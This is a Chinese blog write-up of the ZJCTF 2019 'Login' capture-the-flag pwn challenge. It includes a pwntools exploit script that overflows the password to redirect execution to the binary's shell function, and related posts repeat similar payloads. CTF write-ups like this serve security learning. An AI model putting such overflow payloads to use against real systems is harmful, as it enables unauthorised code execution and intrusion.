[ZJCTF 2019]Login的wp

最新推荐文章于 2023-03-04 21:03:19 发布
最新推荐文章于 2023-03-04 21:03:19 发布
阅读量302 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyvle/article/details/114419072
版权

先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试
在这里插入图片描述
进入ida看看
在这里插入图片描述
在这里插入图片描述
在read_password里找到var_18
在这里插入图片描述
然后通过覆盖var_18, 让他跳到程序自带的shell里
60-18 = 48
e+3a = 48
exp

from pwn import *
 
io = remote('node3.buuoj.cn',28457)
 
shell = 0x400e88
io.sendlineafter(': ','admin')
io.sendlineafter(': ','2jctf_pa5sw0rd'+'\x00'*58+p64(shell))
 
io.interactive()
w0nderMaker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ZJCTF 2019 Login
pondzhang的专栏
05-19 642
from pwn import * p = process('./login') p.sendlineafter("username: ","admin") payload = "2jctf_pa5sw0rd" + '\x00'*58 + p64(0x0000000000400E88) p.sendlineafter("password: ",payload) p.interactive()
buuctf [ZJCTF 2019]Login
carol2358的博客
05-06 1101
先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试 在这里crash了, 去ida里看 ida里自己改名字,原来的看着太乱 反向分析 在read_password里找到var_18 然后通过覆盖var_18, 让他跳到程序自带的shell里 60-18 = 48 e+3a = 48 exp: from pwn import * from LibcSearc...
[ZJCTF 2019]Login--动态调试--详细版
weixin_41748164的博客
11-21 620
全网最详细login的解析,包含静态和动态分析
ZJCTF_login
Morphy_Amo的博客
07-18 485
zjctf_login
[ZJCTF 2019]Login
、moddemod
07-03 844
exp from pwn import * context.log_level = 'debug' proc_name = './login' # p = process(proc_name) p = remote('node3.buuoj.cn', 29641) ...
BUUCTF-PWN-[ZJCTF 2019]Login
最新发布
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
wp-custom-login
05-15
megumi / wp-custom-login 安装 在项目根目录中创建一个composer.json。 { "require": { "megumi/wp-custom-login": "*" } } 贡献 克隆此项目。 $ git clone git@github....
node-wp-login
03-06
重要的: 该应用程序必须在相同的WordPress域上运行。配置档案: index.js港口定义端口app.listen(8000, () => { console.log('listening on port 8000');...秘密钥匙添加在wp-config.php找到的秘密密钥/
LogIn_login_
10-02
Login simple web app
开发工具 login 开发工具 login
05-31
开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发工具 login开发...
ZJCTF_2019_Login
z1r0的博客
12-12 2433
ZJCTF_2019_Login 查看保护 输入正确的密码和用户名,会发生错误,看一下汇编。 在crash之前call 了rax,逆一下找到rax被怎样赋值的。
BUUOJ PWN [ZJCTF 2019]Login
weixin_50287973的博客
11-18 324
输入这些断了下来 是在call rax那断了下来,追踪一下rax [rbp+var_130]的地址作为参数传入User::read_password(void),rax的值赋给了[rbp+var_130] 在password_checker()看看rax怎么来的 这样的话控制[rbp+var_18]为Admin::shell地址就可以了 输入password覆盖到[rbp+var_18] 0x60-0x18=72=14+58 由于_snprintf函数,写入的不含一定0字符的password格式
BUU [ZJCTF 2019]Login
fzucaicai的博客
03-04 840
这是一道让我感觉很淦的题,整一天了才大致了解了来龙去脉。
[BUUCTF]PWN——[ZJCTF 2019]Login
mcmuyanga的博客
11-05 1637
[ZJCTF 2019]Login 附件 步骤: 例行检查,64位程序,开启了canary和nx保护 2. 试运行一下程序 3. 64位ida载入,检索字符串,在程序里找到了用户名admin和密码2jctf_pa5sw0rd 再次尝试登录,无果 在程序里找到了后门函数,backdoor=0x400e88 c++写的程序,看起来有点费劲,自己看了好久都找到漏洞在哪里,后来借鉴了其他师傅的wp后才发现了猫腻 问题出现在检查密码的那个函数上 反编译出来的伪代码看起来没什么问题 但是我们按下tab,
[BUUCTF-pwn]——[ZJCTF 2019]Login
Y_peak的博客
03-11 382
[BUUCTF-pwn]——[ZJCTF 2019]Login 题目地址:https://buuoj.cn/challenges#[ZJCTF%202019]Login 这道题学习还是很多的, 有的时候在源码中跟踪并不一定比在汇编代码中跟踪更快 这里最后一个函数的第一个参数会被当做函数执行,这里我就开始找那个地方可以将这个参数给改了。 v7也就是v3然后找来找去没发现。 不过汇编总是有奇效 这里有一篇博客超级详细, 我也就不在这里赘述了。 点击转跳 ...
CTF-PWN-[ZJCTF 2019]Login 栈位置的转换跟踪
serfend's blog
06-23 1349
来源:https://buuoj.cn/challenges内容:附件:链接:https://pan.baidu.com/s/1uBEYYeg9ouPDEOah-BHGQA?pwd=6si8 提取码:6si8答案:PWN题为动态flag使用安装pwn解题框架发现是cpp的题目,在password_checker的第9行下断点到判断密码的位置,随后输入用户名admin,密码cylic(300)用于测试溢出点和调用点题目是比较密码是否等于,正确则跳转进入 发现此处的值是aaaa,则我们将密码设置为 +cylic
2019-ZJCTF
ChenZIDu的博客
12-13 1101
浙江省大学生网络安全竞赛:逆转思路 这题当初没做出来,可惜了。 主要是php序列化,以及data协议。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="w...
2019ZJCTF-Web
weixin_47813861的博客
09-20 178
不过如此 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_
ZJCTF 2019 Final 登录系统 WP
fjh1997的博客
10-02 1000
ZJCTF 2019 Final 登录系统 WP 复现 复现地址:http://ctf.fjh1997.top:8000/challenges WP 首先拖进IDA里一看,发现是64位的,再仔细看看,发现没有malloc,那么估计是栈题,也许是ROP利用,checksec走一波。 发现有Canary,估计要想办法绕过,但是找了半天没想到绕过方案遂放弃。 在ida里面继续找找,发现是验证用户密码的...
wp-login.php
05-12
wp-login.php 是一个 WordPress 管理员登录页面。这个页面允许管理员通过输入他们的用户名和密码来访问 WordPress 后台控制面板。当管理员尝试访问 /wp-admin/ 或者 /wp-login.php 时,WordPress 会自动跳转到 wp-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值